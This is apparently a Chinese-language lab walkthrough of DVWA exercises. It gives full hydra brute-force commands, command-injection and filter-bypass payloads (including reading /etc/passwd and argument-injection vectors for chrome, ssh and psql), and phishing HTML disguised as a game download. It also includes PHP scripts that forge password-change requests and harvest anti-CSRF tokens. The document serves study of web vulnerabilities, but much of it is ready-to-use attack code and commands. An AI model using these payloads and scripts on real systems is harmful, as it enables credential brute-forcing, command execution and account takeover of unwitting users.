暴力破解
easy模式 hydra -L /usr/share/wordlists/SecLists-master/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/SecLists-master/Passwords/500-worst-passwords.txt 192.168.72.1 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:H=Cookie\: security=low; PHPSESSID=481b089a941d0aecc848227e2e90202e:Username and/or password incorrect." 添加登陆路径、用户名占位符、密码占位符、添加请求头、错误返回的字符串 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:H=Cookie\: security=low; PHPSESSID=481b089a941d0aecc848227e2e90202e:Username and/or password incorrect." 登陆路径:/dvwa/vulnerabilities/brute/ 用户名和密码占位符:username=^USER^&password=^PASS^&Login=Login# 添加请求头:H=Cookie\: security=low; PHPSESSID=481b089a941d0aecc848227e2e90202e(注意冒号转位) 添加错误返回的字符串:Username and/or password incorrect. [80][http-get-form] host: 192.168.72.1 login: admin password: password
medium一样能爆破出,但会睡眠2秒high模式加了一个token,但是加了token跟不加token都能爆破出来 hydra -L usernames.txt -P password.txt 192.168.72.1 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login&user_token=564d1b908f7b4a9e975d00bc707fab3e:H=Cookie\: security=high; PHPSESSID=481b089a941d0aecc848227e2e90202e:Username and/or password incorrect." hydra -L usernames.txt -P password.txt 192.168.72.1 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\: security=high; PHPSESSID=481b089a941d0aecc848227e2e90202e:Username and/or password incorrect." hydra -L usernames.txt -P password.txt 192.168.72.1 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\: security=high;:Username and/or password incorrect."
impossible代码逻辑: 如果登录失败,更新数据库使得用户登录失败次数+1,如果登录失败次数超过3次,account_locked将为false,下次登陆时必须等待 15分钟才会将account_locked设置为true 但是就算等待了15分钟,代码并没有将登陆失败次数清零,所以一旦登陆失败一次,就直接锁住 注:impossible是post,其他难度都是get
命令注入
外部命令注入:
-
;(分号):允许您按顺序执行多个命令。 -
&&(AND):仅当第一个命令成功(返回零退出状态)时才执行第二个命令。 -
||(或):仅当第一个命令失败(返回非零退出状态)时才执行第二个命令。 -
&(后台):在后台执行命令,允许用户继续使用shell。 -
|(管道):获取第一个命令的输出并将其用作第二个命令的输入。 -
这种方法甚至不需要<前面是个正常的linux命令、即使报错也会输出<后面的执行结果<(重定向) :将后者输出重定向前者输入
payload: 127.0.0.1 & whoami 适用于linux(这种方法甚至不需要<前面是个正常的linux命令、即使报错也会输出<后面的执行结果): 127.0.0.1 < "`whoami`" 127.0.0.1 < "$(whoami)"
medium'&&' => '',';' => ''payload: 127.0.0.1 & whoami 127.0.0.1 | whoami 127.0.0.1 &;& whoami 适用于linux: 127.0.0.1 < "`whoami`" 127.0.0.1 < "$(whoami)"
high'&' => '',';' => '','| ' => '','-' => '','$' => '','(' => '',')' => '','`' => '','||' => '',
"| "成为了黑名单,但是"|"去掉空格还能使用
payload:
127.0.0.1 |whoami
impossible 通过.将ip分开,判断分离的数量是否为4,且判断这4部分是否都是数字,这两个条件成立,才会执行ping命令
命令注入其他扩展
参数注入
当您只能将参数附加到现有命令时,即可获得命令执行权。
查询参数注入的网站:Argument Injection Vectors
-
chrome
chrome '--gpu-launcher="id>/tmp/foo"'
-
SSH
ssh '-oProxyCommand="touch /tmp/foo"' foo@foo
-
查询语言
psql -o'|id>/tmp/foo'
字符串内部命令注入
-
反引号
-
$()
-
payload1:
echo "`ip a`" echo "$(ip a)" payload2: 其他命令< "`whoami`"
空格替换
${IFS}替换
cat${IFS}flag.txt
重定向符号替换
cat</etc/passwd
127.0.0.1<"$(whoami)"
csrf
基本思路:构造一个html钓鱼网页,钓鱼网页上有访问dvwa网站修改密码的链接,但是我发现一个问题,就是如果钓鱼网页上直接就是:http://192.168.72.1/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#的话,我们只能操控get请求的数据,不能操控header的数据和post提交的数据,而且最大的问题在于被攻击的人点击这个链接,请求头里有:H=Cookie\: security=impossible; PHPSESSID=481b089a941d0aecc848227e2e90202e,也就是说默认就是困难难度而且网页get请求不能操控header修改不了难度,所以需要使用vps写一个php服务构造恶意请求并发送
easy
前端钓鱼代码
<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Document</title>
</head>
<body><h3>下载游戏</h3><a href="http://192.168.72.1/dvwa/csrf.php">赛博朋克2077</a>
</body>
</html>php伪造请求(csrf.php)
<?php
// 设置要返回的 HTML 内容
$htmlContent = '
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Custom Page</title>
</head>
<body>
<h1>赛博朋克下载</h1>
<p>赛博朋克下载成功</p>
</body>
</html>
';
// 设置响应头,告诉浏览器返回的内容是 HTML
header('Content-Type: text/html');
// 输出 HTML 内容
echo $htmlContent;
$url = 'http://192.168.72.1/dvwa/vulnerabilities/csrf/'; // 要发送请求的 URL
// GET 数据
$get_data = array('password_new' => '6666','password_conf' => '6666','Change' => 'Change'
);
// 自定义请求头
$headers = array('Cookie: PHPSESSID=a0u9pif21dqn9hq1115geuujnk; security=easy',
);
// 初始化 cURL
$ch = curl_init();
// 设置 URL 和其他 cURL 选项
curl_setopt($ch, CURLOPT_URL, $url . '?' . http_build_query($get_data)); // 将 GET 数据添加到 URL
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); // 设置自定义请求头
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// 执行 cURL 请求
$response = curl_exec($ch);
// 检查是否有错误发生
if($response === false) {echo 'cURL error: ' . curl_error($ch);
} else {// 打印响应echo $response;
}
// 关闭 cURL 资源
curl_close($ch);
?>点击后:
同时修改密码成功
medium
需要简单配置:
-
phpstudy给网站个域名,如下图
-
linux攻击机器添加host头
vim /etc/hosts 192.168.72.1 www.oswe.com
为什么需要以上配置:
因为后端代码的判断 变量$_SERVER[ 'HTTP_REFERER' ]是否有$_SERVER[ 'SERVER_NAME' ],如果有,则说明当前修改密码的请求是从本网站跳转过来的,而不是从钓鱼网站跳转过来的, 而$_SERVER[ 'SERVER_NAME' ]这个变量实际上就是你的域名,为了能使我们的linux能解析到域名所以添加hosts头
源码的判断:
if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ){# 正常
}
else{# 错误
}
其中
$_SERVER[ 'HTTP_REFERER' ] = 请求头里的referer
$_SERVER[ 'SERVER_NAME' ] = 域名www.oswe.com
如果请求头的referer中存在域名www.oswe.com,执行正常功能
篡改请求头referer
$headers = array('Cookie: PHPSESSID=a0u9pif21dqn9hq1115geuujnk; security=medium','Referer: http://www.oswe.com/dvwa/vulnerabilities/csrf/'
);
前端钓鱼代码
<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Document</title>
</head>
<body><h3>下载游戏</h3><a href="http://192.168.72.1/dvwa/csrf.php">赛博朋克2077</a>
</body>
</html>后端php伪造恶意请求代码(csrf.php)
<?php
// 设置要返回的 HTML 内容
$htmlContent = '
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Custom Page</title>
</head>
<body>
<h1>赛博朋克下载</h1>
<p>赛博朋克下载成功</p>
</body>
</html>
';
// 设置响应头,告诉浏览器返回的内容是 HTML
header('Content-Type: text/html');
// 输出 HTML 内容
echo $htmlContent;
$url = 'http://192.168.72.1/dvwa/vulnerabilities/csrf/'; // 要发送请求的 URL
// GET 数据
$get_data = array('password_new' => '6666','password_conf' => '6666','Change' => 'Change'
);
// 自定义请求头
$headers = array('Cookie: PHPSESSID=a0u9pif21dqn9hq1115geuujnk; security=medium','Referer: http://www.oswe.com/dvwa/vulnerabilities/csrf/'
);
// 初始化 cURL
$ch = curl_init();
// 设置 URL 和其他 cURL 选项
curl_setopt($ch, CURLOPT_URL, $url . '?' . http_build_query($get_data)); // 将 GET 数据添加到 URL
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); // 设置自定义请求头
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// 执行 cURL 请求
$response = curl_exec($ch);
// 检查是否有错误发生
if($response === false) {echo 'cURL error: ' . curl_error($ch);
} else {// 打印响应echo $response;
}
// 关闭 cURL 资源
curl_close($ch);
?>hard
array_key_exists 函数
— 检查数组里是否有指定的键名或索引
数组里有键 key 时,array_key_exists() 返回 true。 key 可以是任何能作为数组索引的值。
主要检查提交的数据是否完整:
if (array_key_exists("user_token", $_REQUEST) &&array_key_exists("password_new", $_REQUEST) &&array_key_exists("password_conf", $_REQUEST) &&array_key_exists("Change", $_REQUEST))
checkToken 函数
检测请求包的token和用户的会话token是否一致:
if ($_SESSION[ 'session_token' ] === $_REQUEST["user_token"])
关于token
这里的token是一开始请求固定在html页面的表单里的,每一次的请求都会更新一次token的值,我们需要先劫持token然后再伪造请求,固定在表单里的token如下: <form action="#" method="GET">New password:<br /><input type="password" AUTOCOMPLETE="off" name="password_new"><br />Confirm new password:<br /><input type="password" AUTOCOMPLETE="off" name="password_conf"><br /><br /><input type="submit" value="Change" name="Change"><input type='hidden' name='user_token' value='8a5cd4cae342ac86000a7abb1d65a5fa' /> </form>
思路:
-
构造恶意链接,链接向dvwa的high模式下的csrf页面请求两次
-
第一次请求是为了获取到固定在表单里的token
-
第二次请求是为了使用这个token来修改密码
-
前端钓鱼代码
<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Document</title>
</head>
<body><h3>下载游戏</h3><a href="http://192.168.72.1/dvwa/csrf.php">赛博朋克2077</a><a href="http://192.168.72.1/dvwa/csrf_token.php">巫师3</a>
</body>
</html> 其中csrf.php是之前的没有token模式的恶意php请求 csrf_token.php是我们请求两次的恶意php请求
php恶意请求代码csrf_token.php
<?php
// 设置要返回的 HTML 内容
$htmlContent = '
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Custom Page</title>
</head>
<body>
<h1>赛博朋克下载</h1>
<p>赛博朋克下载成功</p>
</body>
</html>
';
// 初始化 cURL
$ch = curl_init();
$url = 'http://192.168.72.1/dvwa/vulnerabilities/csrf/';
$headers = array('Cookie: PHPSESSID=a0u9pif21dqn9hq1115geuujnk; security=high','Referer: http://www.oswe.com/dvwa/vulnerabilities/csrf/'
);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); // 设置自定义请求头
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// 执行 cURL 请求并将结果保存到 $html 变量中
$html = curl_exec($ch);
// 创建一个 DOMDocument 对象并载入 HTML 内容
$dom = new DOMDocument();
@$dom->loadHTML($html);
// 获取所有的 input 标签
$inputElements = $dom->getElementsByTagName('input');
$userTokenValue = null;
// 遍历所有的 input 标签,查找 name 为 user_token 的元素
foreach ($inputElements as $element) {if ($element->getAttribute('name') === 'user_token') {// 输出 user_token 的值$userTokenValue = $element->getAttribute('value');break; // 找到后跳出循环}
}
if ($userTokenValue) {echo "使用了如下token修改密码:". $userTokenValue;
} else {echo "user_token not found";
}
// 设置响应头,告诉浏览器返回的内容是 HTML
header('Content-Type: text/html');
// 输出 HTML 内容
echo $htmlContent;
// GET 数据
$get_data = array('password_new' => '8888','password_conf' => '8888','Change' => 'Change','user_token' => $userTokenValue
);
// 设置 URL 和其他 cURL 选项
curl_setopt($ch, CURLOPT_URL, $url . '?' . http_build_query($get_data)); // 将 GET 数据添加到 URL
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); // 设置自定义请求头
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// 执行 cURL 请求
$response = curl_exec($ch);
// 检查是否有错误发生
// if($response === false) {
// echo 'cURL error: ' . curl_error($ch);
// } else {
// // 打印响应
// echo $response;
// }
// 关闭 cURL 资源
curl_close($ch);
?>
这里点的是巫师3,但显示下载成功的是赛博朋克,是因为这个返回页面我懒得该,直接返回的字符串
impossible
修改密码前,输入当前密码来身份验证,导致csrf请求伪造无法获取用户凭据
